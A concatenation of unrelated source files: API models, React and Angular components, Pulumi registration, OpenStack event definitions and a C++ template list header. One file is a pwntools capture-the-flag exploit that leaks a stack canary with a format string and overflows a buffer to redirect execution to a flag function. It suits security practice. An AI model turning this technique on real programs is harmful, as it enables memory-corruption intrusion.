allowed_values = ["QuotedSecurity", "InterestRateSwap", "FxForward", "Future", "ExoticInstrument", "FxOption", "CreditDefaultSwap", "InterestRateSwaption", "Bond", "EquityOption", "FixedLeg", "FloatingLeg", "BespokeCashFlowsLeg", "Unknown", "TermDeposit", "ContractForDifference", "EquitySwap", "CashPerpetual", "CashSettled", "CdsIndex", "Basket", "FundingLeg", "CrossCurrencySwap", "FxSwap"] # noqa: E501
if instrument_type not in allowed_values:
raise ValueError(
"Invalid value for `instrument_type` ({0}), must be one of {1}" # noqa: E501
.format(instrument_type, allowed_values)
)
self._instrument_type = instrument_type
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, FxForwardAllOf):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
#import <React/RCTBridgeModule.h>
@interface Multibundle : NSObject <RCTBridgeModule>
@end
|
import {
getMoveDelta,
nodes
} from './brush-range-node-builder';
import {
startArea,
moveArea,
endArea
} from './brush-range-interaction';
import rangeCollection from '../../../core/brush/range-collection';
import {
TARGET_SIZE,
VERTICAL,
HORIZONTAL
} from './brush-range-const';
function render(state) {
state.renderer.render(nodes(state));
}
function ranges(state) {
return state.rc.ranges();
}
function shapesFromRange(state, brushRange) {
const shapeAt = {
x: state.direction ? brushRange.min + state.rect.x : state.rect.x,
y: state.direction ? state.rect.y : brushRange.min + state.rect.y,
width: state.direction ? brushRange.max - brushRange.min : state.rect.width + state.rect.x,
height: state.direction ? state.rect.height + state.rect.y : brushRange.max - brushRange.min
};
return state.chart.shapesAt(shapeAt, state.settings.brush);
}
function brushFromShape(state, newShapes) {
state.chart.brushFromShapes(newShapes, state.settings.brush);
}
function setRanges(state) {
const rs = state.ranges.map(r => ({ min: r.min, max: r.max }));
if (state.active.idx !== -1) {
if (state.active.mode === 'modify') {
rs[state.active.idx].min = Math.min(state.start, state.current);
rs[state.active.idx].max = Math.max(state.start, state.current);
} else {
const delta = getMoveDelta(state);
rs[state.active.idx].min = state.active.start + delta;
rs[state.active.idx].max = state.active.end + delta;
}
} else {
rs.push({
min: Math.min(state.start, state.current),
max: Math.max(state.start, state.current)
});
}
state.rc.set(rs);
const shapes = [];
rs.forEach((range) => {
shapes.push(...shapesFromRange(state, range));
});
brushFromShape(state, shapes);
}
function getBubbleLabel(state, value, range) {
const min = Math.min(...range);
const max = Math.max(...range);
const shapeAt = {
x: state.direction ? min + state.rect.x : state.rect.x,
y: state.direction ? state.rect.y : min + state.rect.y,
width: state.direction ? max - min : state.rect.width + state.rect.x,
height: state.direction ? state.rect.height + state.rect.y : max - min
};
const shapes = state.chart.shapesAt(shapeAt, state.settings.brush);
if (shapes.length === 0) {
return '-';
}
const labelShape = shapes.reduce((s0, s1) => {
// Min value
const bounds0 = s0.bounds;
const bounds1 = s1.bounds;
if (value === min) {
if (bounds0[state.cssCoord.coord] <= bounds1[state.cssCoord.coord]) {
return s0;
}
return s1;
}
// Max value
if (bounds0[state.cssCoord.coord] + bounds0[state.cssCoord.area] >= bounds1[state.cssCoord.coord] + bounds1[state.cssCoord.area]) {
return s0;
}
return s1;
});
const compConfig = state.settings.brush.components.reduce((c0, c1) => (c0.key === labelShape.key ? c0 : c1));
if (typeof state.settings.bubbles.label === 'function') {
return state.settings.bubbles.label(labelShape.data);
} else if (Array.isArray(compConfig.data) && compConfig.data.length) {
return labelShape.data[compConfig.data[0]].label;
}
return labelShape.data && labelShape.data.label ? labelShape.data.label : '-';
}
/**
* @typedef {object} component--brush-area-dir-settings
* @property {object} brush
* @property {array} brush.components
* @property {object} brush.components[].key - Component key
* @property {object} brush.components[].contexts[] - Brush context to apply changes to
* @property {object} [brush.components[].data] - Data reference
* @property {object} [brush.components[].action] - Type of brush action
* @property {string} [direction=vertical] - Rendering direction [horizontal|vertical]
* @property {object} [bubbles]
* @property {boolean} [bubbles.show=true] - True to show label bubble, false otherwise
* @property {string} [bubbles.align=start] - Where to anchor bubble [start|end]
* @property {function} [bubbles.label] - Callback function for the labels
* @property {object} [target]
* @property {string} [target.component] - Render matching overlay on target component
*/
/**
* @typedef {object} component--brush-area-dir-style
* @property {object} [bubble]
* @property {string} [bubble.fontSize]
* @property {string} [bubble.fontFamily]
* @property {string} [bubble.fill]
* @property {string} [bubble.color]
* @property {string} [bubble.stroke]
* @property {number} [bubble.strokeWidth]
* @property {number} [bubble.borderRadius]
* @property {object} [line]
* @property {string} [line.stroke]
* @property {number} [line.strokeWidth]
* @property {object} [target]
* @property {string} [target.fill]
* @property {number} [target.strokeWidth]
* @property {number} [target.opacity]
*/
const brushAreaDirectionalComponent = {
require: ['chart', 'settings', 'renderer'],
defaultSettings: {
settings: {
bubbles: {
show: true,
align: 'start'
}
},
style: {
bubble: '$label-overlay',
line: '$shape-guide--inverted',
target: '$selection-area-target'
}
},
renderer: 'dom',
on: {
areaStart(e) { this.start(e); },
areaMove(e) { this.move(e); },
areaEnd(e) { this.end(e); },
areaClear(e) { this.clear(e); }
},
created() {
this.rect = {
x: 0, y: 0, width: 0, height: 0
};
this.state = {};
},
beforeRender(opts) {
this.rect = opts.size;
},
render(h) {
this.state.rect = this.rect;
const stngs = this.settings.settings;
const direction = stngs.direction === 'vertical' ? VERTICAL : HORIZONTAL;
const size = this.state.rect[direction === VERTICAL ? 'height' : 'width'];
const offset = this.renderer.element().getBoundingClientRect();
const target = stngs.target ? this.chart.component(stngs.target.component) : null;
if (target && target.rect) {
this.state.targetRect = {
x: (target.rect.x - this.rect.x),
y: (target.rect.y - this.rect.y),
width: target.rect.width,
height: target.rect.height
};
} else {
this.state.targetRect = null;
}
this.state.style = this.style;
this.state.chart = this.chart;
this.state.direction = direction;
this.state.settings = stngs;
this.state.offset = offset;
this.state.rc = rangeCollection();
this.state.renderer = this.renderer;
this.state.multi = !!stngs.multiple;
this.state.h = h;
this.state.size = size;
this.state.cssCoord = {
offset: this.state.direction === VERTICAL ? 'top' : 'left',
coord: this.state.direction === VERTICAL ? 'y' : 'x',
pos: this.state.direction === VERTICAL ? 'deltaY' : 'deltaX',
area: this.state.direction === VERTICAL ? 'height' : 'width'
};
this.state.format = function getFormat(v, r) {
return getBubbleLabel(this, v, r);
};
return [];
},
start(e) {
startArea({
e,
state: this.state,
renderer: this.renderer,
ranges,
targetSize: TARGET_SIZE
});
},
end() {
if (!this.state.started) {
return;
}
endArea(this.state, ranges);
render(this.state);
},
move(e) {
if (!this.state.started) {
return;
}
moveArea(this.state, e);
setRanges(this.state);
render(this.state);
},
clear() {
if (this.state.rc) {
this.state.rc.clear();
}
this.state.renderer.render([]);
}
};
export default brushAreaDirectionalComponent;
|
import React, { Component } from "react";
import logo from "./logo.svg";
import "./App.css";
import { ApolloClient, gql, graphql, ApolloProvider } from "react-apollo";
const client = new ApolloClient();
const channelsListQuery = gql`
query ChannelsListQuery {
channels {
id
name
}
}
`;
const ChannelsList = ({ data: {loading, error, channels }}) => {
if (loading) {
return <p>Loading ...</p>;
}
if (error) {
return <p>{error.message}</p>;
}
return <ul>
{ channels.map( ch => <li key={ch.id}>{ch.name}</li> ) }
</ul>;
};
const ChannelsListWithData = graphql(channelsListQuery)(ChannelsList);
class App extends Component {
render() {
return (
<ApolloProvider client={client}>
<div className="App">
<div className="App-header">
<img src={logo} className="App-logo" alt="logo" />
<h2>Welcome to React</h2>
</div>
<ChannelsListWithData />
</div>
</ApolloProvider>
);
}
}
export default App;
|
/* eslint-disable no-undef */
import React from 'react';
import { render } from '@testing-library/react';
import { DayOfWeek } from '../../src/components';
it('render day of week and confirm title appears', () => {
const { getByText } = render(
<DayOfWeek
title="Sun"
highTemp="72.5"
lowTemp="71.5"
weather="01d"
/>);
const title = getByText('Sun');
expect(title).toBeTruthy();
});
it('render day of week without crashing', () => {
const { getByText } = render(
<DayOfWeek
title="Sun"
highTemp="5"
lowTemp="9"
weather="01"
/>);
const title = getByText("Sun");
expect(title).toBeTruthy();
});
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
# Export this package's modules as members:
from .alarm import *
from .attachment import *
from .get_alarms import *
from .get_lifecycle_hooks import *
from .get_notifications import *
from .get_scaling_configurations import *
from .get_scaling_groups import *
from .get_scaling_rules import *
from .get_scheduled_tasks import *
from .lifecycle_hook import *
from .notification import *
from .scaling_configuration import *
from .scaling_group import *
from .scaling_group_v_server_groups import *
from .scaling_rule import *
from .schedule import *
from .scheduled_task import *
from ._inputs import *
from . import outputs
def _register_module():
import pulumi
from .. import _utilities
class Module(pulumi.runtime.ResourceModule):
_version = _utilities.get_semver_version()
def version(self):
return Module._version
def construct(self, name: str, typ: str, urn: str) -> pulumi.Resource:
if typ == "alicloud:ess/alarm:Alarm":
return Alarm(name, pulumi.ResourceOptions(urn=urn))
elif typ == "alicloud:ess/attachment:Attachment":
return Attachment(name, pulumi.ResourceOptions(urn=urn))
elif typ == "alicloud:ess/lifecycleHook:LifecycleHook":
return LifecycleHook(name, pulumi.ResourceOptions(urn=urn))
elif typ == "alicloud:ess/notification:Notification":
return Notification(name, pulumi.ResourceOptions(urn=urn))
elif typ == "alicloud:ess/scalingConfiguration:ScalingConfiguration":
return ScalingConfiguration(name, pulumi.ResourceOptions(urn=urn))
elif typ == "alicloud:ess/scalingGroup:ScalingGroup":
return ScalingGroup(name, pulumi.ResourceOptions(urn=urn))
elif typ == "alicloud:ess/scalingGroupVServerGroups:ScalingGroupVServerGroups":
return ScalingGroupVServerGroups(name, pulumi.ResourceOptions(urn=urn))
elif typ == "alicloud:ess/scalingRule:ScalingRule":
return ScalingRule(name, pulumi.ResourceOptions(urn=urn))
elif typ == "alicloud:ess/schedule:Schedule":
return Schedule(name, pulumi.ResourceOptions(urn=urn))
elif typ == "alicloud:ess/scheduledTask:ScheduledTask":
return ScheduledTask(name, pulumi.ResourceOptions(urn=urn))
else:
raise Exception(f"unknown resource type {typ}")
_module_instance = Module()
pulumi.runtime.register_resource_module("alicloud", "ess/alarm", _module_instance)
pulumi.runtime.register_resource_module("alicloud", "ess/attachment", _module_instance)
pulumi.runtime.register_resource_module("alicloud", "ess/lifecycleHook", _module_instance)
pulumi.runtime.register_resource_module("alicloud", "ess/notification", _module_instance)
pulumi.runtime.register_resource_module("alicloud", "ess/scalingConfiguration", _module_instance)
pulumi.runtime.register_resource_module("alicloud", "ess/scalingGroup", _module_instance)
pulumi.runtime.register_resource_module("alicloud", "ess/scalingGroupVServerGroups", _module_instance)
pulumi.runtime.register_resource_module("alicloud", "ess/scalingRule", _module_instance)
pulumi.runtime.register_resource_module("alicloud", "ess/schedule", _module_instance)
pulumi.runtime.register_resource_module("alicloud", "ess/scheduledTask", _module_instance)
_register_module()
|
import AbstractNodeScreen from '@triniti/cms/plugins/ncr/screens/node';
import createDelegateFactory from '@triniti/app/createDelegateFactory';
import { connect } from 'react-redux';
import delegateFactory from './delegate';
import Form from './Form';
import selector from './selector';
class AppScreen extends AbstractNodeScreen {
getForm() {
return Form;
}
getFormRenderProps() {
const { getNodeRequestState } = this.props;
return {
getNodeRequestState,
type: this.props.match.params.type,
};
}
getTabs() {
return [
'details',
'roles',
];
}
}
export default connect(selector, createDelegateFactory(delegateFactory))(AppScreen);
|
/**
* APIMATICCalculatorDevOpsLib
*
* This file was automatically generated for testing by APIMATIC v2.0 ( https://apimatic.io ).
*/
;(function (angular) {
'use strict';
angular.module('APIMATICCalculatorDevOpsLib')
.factory('Configuration', [Configuration]);
function Configuration() {
return {
//The base Uri for API calls
BASEURI : 'http://examples.apimatic.io/apps/calculator'
};
}
}(angular));
|
# Copyright 2017 NTT DATA
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" VM libvirt events
These are the events which needs to be processed by masakari in case of
instance recovery failure.
"""
INSTANCE_EVENTS = {
# Add QEMU guest agent events here.
'QEMU_GUEST_AGENT_ERROR': ['STOPPED_FAILED'],
# Add more events and vir_domain_events here.
'LIFECYCLE': ['STOPPED_FAILED'],
'IO_ERROR': ['IO_ERROR_REPORT']
}
def is_valid_event(payload):
vir_domain_event_list = INSTANCE_EVENTS.get(payload.get('event'))
if vir_domain_event_list and payload.get(
'vir_domain_event') in vir_domain_event_list:
return True
return False
|
import React from 'react';
import { Grid, Header, Segment } from 'semantic-ui-react'
export default class ForumHeader extends React.Component {
render() {
return (
<Segment attached='top' secondary>
<Grid>
<Grid.Row>
<Grid.Column width={10}>
<Header size='small'>
Forum
</Header>
</Grid.Column>
<Grid.Column width={2} only='large screen' className='center aligned'>
<Header size='small'>
Replies
</Header>
</Grid.Column>
<Grid.Column width={4} only='large screen'>
<Header size='small'>
Latest Reply
</Header>
</Grid.Column>
</Grid.Row>
</Grid>
</Segment>
)
}
}
|
from pwn import *
#p = process("./canary"); gdb.attach(p)
p = remote("shell.actf.co", 20701)
e = ELF("./canary")
xpl = ""
xpl += "%17$lx"
p.sendlineafter("your name?", xpl)
canary = p.recvline()
canary = canary.split(" ")[5].replace("!", "")
canary = int(canary, 16)
info("Canary ==> %s"%hex(canary))
xpl = ""
xpl += "A"*56
xpl += p64(canary)
xpl += "A"*8
xpl += p64(e.sym["flag"])
p.sendlineafter("tell me?", xpl)
p.interactive()
#p.wait()
#core = p.corefile
#stack = core.rsp
#info("%#x stack", stack)
#actf{youre_a_canary_killer_>:(}
|
///\file
/******************************************************************************
The MIT License(MIT)
Embedded Template Library.
https://github.com/ETLCPP/etl
http://www.etlcpp.com
Copyright(c) 2014 jwellbelove
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files(the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions :
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
******************************************************************************/
#ifndef __ETL_LIST__
#define __ETL_LIST__
#include <iterator>
#include <algorithm>
#include <functional>
#include <stddef.h>
#include "platform.h"
#include "container.h"
#include "pool.h"
#include "exception.h"
#include "error_handler.h"
#include "debug_count.h"
#include "nullptr.h"
#include "type_traits.h"
#include "parameter_type.h"
#include "algorithm.h"
#ifdef ETL_COMPILER_MICROSOFT
#undef min
#endif
#undef ETL_FILE
#define ETL_FILE "7"
//*****************************************************************************
///\defgroup list list
/// A linked list with the capacity defined at compile time.
///\ingroup containers
//*****************************************************************************
namespace etl
{
//***************************************************************************
/// Exception for the list.
///\ingroup list
//***************************************************************************
class list_exception : public exception
{
public:
list_exception(string_type reason_, string_type file_name_, numeric_type line_number_)
: exception(reason_, file_name_, line_number_)
{
}
};
//***************************************************************************
/// Full exception for the list.
///\ingroup list
//***************************************************************************
class list_full : public list_exception
{
public:
list_full(string_type file_name_, numeric_type line_number_)
: list_exception(ETL_ERROR_TEXT("list:full", ETL_FILE"A"), file_name_, line_number_)
{
}
};
//***************************************************************************
/// Empty exception for the list.
///\ingroup list
//***************************************************************************
class list_empty : public list_exception
{
public:
list_empty(string_type file_name_, numeric_type line_number_)
: list_exception(ETL_ERROR_TEXT("list:empty", ETL_FILE"B"), file_name_, line_number_)
{
}
};
//***************************************************************************
/// Iterator exception for the list.
///\ingroup list
//***************************************************************************
class list_iterator : public list_exception
{
public:
list_iterator(string_type file_name_, numeric_type line_number_)
: list_exception(ETL_ERROR_TEXT("list:iterator", ETL_FILE"C"), file_name_, line_number_)
{
}
};
//***************************************************************************
/// Unsorted exception for the list.
///\ingroup list
//***************************************************************************
class list_unsorted : public list_exception
{
public:
list_unsorted(string_type file_name_, numeric_type line_number_)
: list_exception(ETL_ERROR_TEXT("list:unsorted", ETL_FILE"D"), file_name_, line_number_)
{
}
};
//***************************************************************************
/// The base class for all lists.
///\ingroup list
//***************************************************************************
class list_base
{
public:
typedef size_t size_type; ///< The type used for determining the size of list.
//*************************************************************************
/// The node element in the list.
//*************************************************************************
struct node_t
{
//***********************************************************************
/// Constructor
//***********************************************************************
node_t()
: previous(nullptr),
next(nullptr)
{
}
//***********************************************************************
/// Reverses the previous & next pointers.
//***********************************************************************
inline void reverse()
{
std::swap(previous, next);
}
node_t* previous;
node_t* next;
};
//*************************************************************************
/// Reverses the list.
//*************************************************************************
void reverse()
{
if (is_trivial_list())
{
return;
}
node_t* p_node = terminal_node.next;
while (p_node != &terminal_node)
{
node_t* p_temp = p_node->previous;
p_node->previous = p_node->next;
p_node->next = p_temp;
p_node = p_node->previous;
}
// Terminal node.
node_t* p_temp = p_node->previous;
p_node->previous = p_node->next;
p_node->next = p_temp;
}
//*************************************************************************
/// Gets the maximum possible size of the list.
//*************************************************************************
size_type max_size() const
{
return MAX_SIZE;
}
//*************************************************************************
/// Gets the size of the list.
//*************************************************************************
size_type size() const
{
return p_node_pool->size();
}
//*************************************************************************
/// Checks to see if the list is empty.
//*************************************************************************
bool empty() const
{
return p_node_pool->empty();
}
//*************************************************************************
/// Checks to see if the list is full.
//*************************************************************************
bool full() const
{
return p_node_pool->size() == MAX_SIZE;
}
//*************************************************************************
/// Returns the remaining capacity.
///\return The remaining capacity.
//*************************************************************************
size_t available() const
{
return max_size() - size();
}
//*************************************************************************
/// Is the list a trivial length?
//*************************************************************************
bool is_trivial_list() const
{
return (size() < 2);
}
protected:
//*************************************************************************
/// Get the head node.
//*************************************************************************
node_t& get_head()
{
return *terminal_node.next;
}
//*************************************************************************
/// Get the head node.
//*************************************************************************
const node_t& get_head() const
{
return *terminal_node.next;
}
//*************************************************************************
/// Get the tail node.
//*************************************************************************
node_t& get_tail()
{
return *terminal_node.previous;
}
//*************************************************************************
/// Get the tail node.
//*************************************************************************
const node_t& get_tail() const
{
return *terminal_node.previous;
}
//*************************************************************************
/// Insert a node before 'position'.
//*************************************************************************
void insert_node(node_t& position, node_t& node)
{
// Connect to the list.
join(*position.previous, node);
join(node, position);
}
//*************************************************************************
/// Join two nodes.
//*************************************************************************
void join(node_t& left, node_t& right)
{
left.next = &right;
right.previous = &left;
}
//*************************************************************************
/// The constructor that is called from derived classes.
//*************************************************************************
list_base(etl::ipool& node_pool_, size_type max_size_)
: p_node_pool(&node_pool_),
MAX_SIZE(max_size_)
{
}
//*************************************************************************
/// Destructor.
//*************************************************************************
~list_base()
{
}
etl::ipool* p_node_pool; ///< The pool of data nodes used in the list.
node_t terminal_node; ///< The node that acts as the list start and end.
const size_type MAX_SIZE; ///< The maximum size of the list.
etl::debug_count construct_count; ///< Internal debugging.
};
//***************************************************************************
/// A templated base for all etl::list types.
///\ingroup list
//***************************************************************************
template <typename T>
class ilist : public etl::list_base
{
public:
typedef T value_type;
typedef T* pointer;
typedef const T* const_pointer;
typedef T& reference;
typedef const T& const_reference;
typedef size_t size_type;
protected:
typedef typename etl::parameter_type<T>::type parameter_t;
//*************************************************************************
/// The data node element in the list.
//*************************************************************************
struct data_node_t : public node_t
{
explicit data_node_t(parameter_t value_)
: value(value_)
{
}
T value;
};
private:
//*************************************************************************
/// Downcast a node_t* to a data_node_t*
//*************************************************************************
static data_node_t* data_cast(node_t* p_node)
{
return reinterpret_cast<data_node_t*>(p_node);
}
//*************************************************************************
/// Downcast a node_t& to a data_node_t&
//*************************************************************************
static data_node_t& data_cast(node_t& node)
{
return reinterpret_cast<data_node_t&>(node);
}
//*************************************************************************
/// Downcast a const node_t* to a const data_node_t*
//*************************************************************************
static const data_node_t* data_cast(const node_t* p_node)
{
return reinterpret_cast<const data_node_t*>(p_node);
}
//*************************************************************************
/// Downcast a const node_t& to a const data_node_t&
//*************************************************************************
static const data_node_t& data_cast(const node_t& node)
{
return reinterpret_cast<const data_node_t&>(node);
}
public:
//*************************************************************************
/// iterator.
//*************************************************************************
class iterator : public std::iterator<std::bidirectional_iterator_tag, T>
{
public:
friend class ilist;
iterator()
: p_node(nullptr)
{
}
iterator(node_t& node)
: p_node(&node)
{
}
iterator(const iterator& other)
: p_node(other.p_node)
{
}
iterator& operator ++()
{
p_node = p_node->next;
return *this;
}
iterator operator ++(int)
{
iterator temp(*this);
p_node = p_node->next;
return temp;
}
iterator& operator --()
{
p_node = p_node->previous;
return *this;
}
iterator operator --(int)
{
iterator temp(*this);
p_node = p_node->previous;
return temp;
}
iterator operator =(const iterator& other)
{
p_node = other.p_node;
return *this;
}
reference operator *()
{
return ilist::data_cast(p_node)->value;
}
const_reference operator *() const
{
return ilist::data_cast(p_node)->value;
}
pointer operator &()
{
return &(ilist::data_cast(p_node)->value);
}
const_pointer operator &() const
{
return &(ilist::data_cast(p_node)->value);
}
pointer operator ->()
{
return &(ilist::data_cast(p_node)->value);
}
const_pointer operator ->() const
{
return &(ilist::data_cast(p_node)->value);
}
friend bool operator == (const iterator& lhs, const iterator& rhs)
{
return lhs.p_node == rhs.p_node;
}
friend bool operator != (const iterator& lhs, const iterator& rhs)
{
return !(lhs == rhs);
}
private:
node_t* p_node;
};
//*************************************************************************
/// const_iterator
//*************************************************************************
class const_iterator : public std::iterator<std::bidirectional_iterator_tag, const T>
{
public:
friend class ilist;
const_iterator()
: p_node(nullptr)
{
}
const_iterator(node_t& node)
: p_node(&node)
{
}
const_iterator(const node_t& node)
: p_node(&node)
{
}
const_iterator(const typename ilist::iterator& other)
: p_node(other.p_node)
{
}
const_iterator(const const_iterator& other)
: p_node(other.p_node)
{
}
const_iterator& operator ++()
{
p_node = p_node->next;
return *this;
}
const_iterator operator ++(int)
{
const_iterator temp(*this);
p_node = p_node->next;
return temp;
}
const_iterator& operator --()
{
p_node = p_node->previous;
return *this;
}
const_iterator operator --(int)
{
const_iterator temp(*this);
p_node = p_node->previous;
return temp;
}
const_iterator operator =(const const_iterator& other)
{
p_node = other.p_node;
return *this;
}
const_reference operator *() const
{
return ilist::data_cast(p_node)->value;
}
const_pointer operator &() const
{
return &(ilist::data_cast(p_node)->value);
}
const_pointer operator ->() const
{
return &(ilist::data_cast(p_node)->value);
}
friend bool operator == (const const_iterator& lhs, const const_iterator& rhs)
{
return lhs.p_node == rhs.p_node;
}
friend bool operator != (const const_iterator& lhs, const const_iterator& rhs)
{
return !(lhs == rhs);
}
private:
const node_t* p_node;
};
typedef typename std::iterator_traits<iterator>::difference_type difference_type;
typedef std::reverse_iterator<iterator> reverse_iterator;
typedef std::reverse_iterator<const_iterator> const_reverse_iterator;
//*************************************************************************
/// Gets the beginning of the list.
//*************************************************************************
iterator begin()
{
return iterator(get_head());
}
//*************************************************************************
/// Gets the beginning of the list.
//*************************************************************************
const_iterator begin() const
{
return const_iterator(get_head());
}
//*************************************************************************
/// Gets the end of the list.
//*************************************************************************
iterator end()
{
return iterator(terminal_node);
}
//*************************************************************************
/// Gets the end of the list.
//*************************************************************************
const_iterator end() const
{
return const_iterator(static_cast<const data_node_t&>(terminal_node));
}
//*************************************************************************
/// Gets the beginning of the list.
//*************************************************************************
const_iterator cbegin() const
{
return const_iterator(get_head());
}
//*************************************************************************
/// Gets the end of the list.
//*************************************************************************
const_iterator cend() const
{
return const_iterator(static_cast<const data_node_t&>(terminal_node));
}
//*************************************************************************
/// Gets the reverse beginning of the list.
//*************************************************************************
reverse_iterator rbegin()
{
return reverse_iterator(terminal_node);
}
//*************************************************************************
/// Gets the reverse beginning of the list.
//*************************************************************************
const_reverse_iterator rbegin() const
{
return const_reverse_iterator(static_cast<const data_node_t&>(terminal_node));
}
//*************************************************************************
/// Gets the reverse end of the list.
//*************************************************************************
reverse_iterator rend()
{
return reverse_iterator(get_head());
}
//*************************************************************************
/// Gets the reverse beginning of the list.
//*************************************************************************
const_reverse_iterator crbegin() const
{
return const_reverse_iterator(static_cast<const data_node_t&>(terminal_node));
}
//*************************************************************************
/// Gets the reverse end of the list.
//*************************************************************************
const_reverse_iterator crend() const
{
return const_reverse_iterator(get_head());
}
//*************************************************************************
/// Gets a reference to the first element.
//*************************************************************************
reference front()
{
return data_cast(get_head()).value;
}
//*************************************************************************
/// Gets a const reference to the first element.
//*************************************************************************
const_reference front() const
{
return data_cast(get_head()).value;
}
//*************************************************************************
/// Gets a reference to the last element.
//*************************************************************************
reference back()
{
return data_cast(get_tail()).value;
}
//*************************************************************************
/// Gets a reference to the last element.
//*************************************************************************
const_reference back() const
{
return data_cast(get_tail()).value;
}
//*************************************************************************
/// Assigns a range of values to the list.
/// If asserts or exceptions are enabled throws etl::list_full if the list does not have enough free space.
/// If ETL_THROW_EXCEPTIONS & ETL_DEBUG are defined throws list_iterator if the iterators are reversed.
//*************************************************************************
template <typename TIterator>
void assign(TIterator first, TIterator last)
{
#if defined(ETL_DEBUG)
difference_type d = std::distance(first, last);
ETL_ASSERT(d >= 0, ETL_ERROR(list_iterator));
ETL_ASSERT(size_t(d) <= MAX_SIZE, ETL_ERROR(list_full));
#endif
initialise();
// Add all of the elements.
while (first != last)
{
data_node_t& node = allocate_data_node(*first);
join(get_tail(), node);
join(node, terminal_node);
++first;
}
}
//*************************************************************************
/// Assigns 'n' copies of a value to the list.
//*************************************************************************
void assign(size_t n, parameter_t value)
{
#if defined(ETL_DEBUG)
ETL_ASSERT(n <= MAX_SIZE, ETL_ERROR(list_full));
#endif
initialise();
// Add all of the elements.
while (size() < n)
{
data_node_t& node = allocate_data_node(value);
join(*terminal_node.previous, node);
join(node, terminal_node);
}
}
//*************************************************************************
/// Adds a node to the front of the list so a new value can be assigned to front().
//*************************************************************************
void push_front()
{
push_front(T());
}
//*************************************************************************
/// Pushes a value to the front of the list.
//*************************************************************************
void push_front(parameter_t value)
{
#if defined(ETL_CHECK_PUSH_POP)
ETL_ASSERT(!full(), ETL_ERROR(list_full));
#endif
insert_node(get_head(), allocate_data_node(value));
}
//*************************************************************************
/// Emplaces a value to the front of the list..
//*************************************************************************
template <typename T1>
void emplace_front(const T1& value1)
{
#if defined(ETL_CHECK_PUSH_POP)
ETL_ASSERT(!full(), ETL_ERROR(list_full));
#endif
data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
::new (&(p_data_node->value)) T(value1);
++construct_count;
insert_node(get_head(), *p_data_node);
}
//*************************************************************************
/// Emplaces a value to the front of the list..
//*************************************************************************
template <typename T1, typename T2>
void emplace_front(const T1& value1, const T2& value2)
{
#if defined(ETL_CHECK_PUSH_POP)
ETL_ASSERT(!full(), ETL_ERROR(list_full));
#endif
data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
::new (&(p_data_node->value)) T(value1, value2);
++construct_count;
insert_node(get_head(), *p_data_node);
}
//*************************************************************************
/// Emplaces a value to the front of the list..
//*************************************************************************
template <typename T1, typename T2, typename T3>
void emplace_front(const T1& value1, const T2& value2, const T3& value3)
{
#if defined(ETL_CHECK_PUSH_POP)
ETL_ASSERT(!full(), ETL_ERROR(list_full));
#endif
data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
::new (&(p_data_node->value)) T(value1, value2, value3);
++construct_count;
insert_node(get_head(), *p_data_node);
}
//*************************************************************************
/// Emplaces a value to the front of the list..
//*************************************************************************
template <typename T1, typename T2, typename T3, typename T4>
void emplace_front(const T1& value1, const T2& value2, const T3& value3, const T4& value4)
{
#if defined(ETL_CHECK_PUSH_POP)
ETL_ASSERT(!full(), ETL_ERROR(list_full));
#endif
data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
::new (&(p_data_node->value)) T(value1, value2, value3, value4);
++construct_count;
insert_node(get_head(), *p_data_node);
}
//*************************************************************************
/// Removes a value from the front of the list.
//*************************************************************************
void pop_front()
{
#if defined(ETL_CHECK_PUSH_POP)
ETL_ASSERT(!empty(), ETL_ERROR(list_empty));
#endif
node_t& node = get_head();
remove_node(node);
}
//*************************************************************************
/// Adds a node to the back of the list so a new value can be assigned to back().
//*************************************************************************
void push_back()
{
push_back(T());
}
//*************************************************************************
/// Pushes a value to the back of the list..
//*************************************************************************
void push_back(parameter_t value)
{
#if defined(ETL_CHECK_PUSH_POP)
ETL_ASSERT(!full(), ETL_ERROR(list_full));
#endif
insert_node(terminal_node, allocate_data_node(value));
}
//*************************************************************************
/// Emplaces a value to the back of the list..
//*************************************************************************
template <typename T1>
void emplace_back(const T1& value1)
{
#if defined(ETL_CHECK_PUSH_POP)
ETL_ASSERT(!full(), ETL_ERROR(list_full));
#endif
